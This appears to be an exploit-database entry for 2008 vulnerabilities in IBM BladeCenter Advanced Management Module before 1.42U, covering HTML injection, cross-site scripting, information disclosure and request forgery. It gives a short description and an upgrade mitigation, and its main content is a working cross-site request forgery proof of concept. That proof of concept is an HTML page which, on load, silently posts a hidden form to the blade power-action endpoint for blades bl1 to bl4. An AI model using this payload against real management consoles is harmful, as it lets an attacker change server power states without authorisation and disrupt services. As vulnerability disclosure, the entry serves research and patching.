header-logo
Suggest Exploit
vendor:
BladeCenter Advanced Management Module
by:
SecurityFocus
7.5
CVSS
HIGH
HTML-injection, Cross-site scripting, Information-disclosure, Cross-site request-forgery
79, 79, 200, 352
CWE
Product Name: BladeCenter Advanced Management Module
Affected Version From: 1
Affected Version To: 1.42U
Patch Exists: YES
Related CWE: N/A
CPE: h:ibm:bladecenter_advanced_management_module
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

IBM BladeCenter Advanced Management Module Remote Vulnerabilities

An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.

Mitigation:

Upgrade to BladeCenter Advanced Management Module 1.42U or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34447/info
  
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
  
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
  
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
  
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. 

<html> <body onload="document.foobar.submit()"> <form name="foobar" method="post" action="http://example.com/private/blade_power_action" style="display:none"> <input name="COMMAND" value="6.3.2"> <input name="STATE" value="0"> <input name="CHECKED" value="15"> <input name="selall" value="on"> <input name="sel" value="bl1"> <input name="sel" value="bl2"> <input name="sel" value="bl3"> <input name="sel" value="bl4"> <input name="JUNK" value="1"> </form> <body> </html>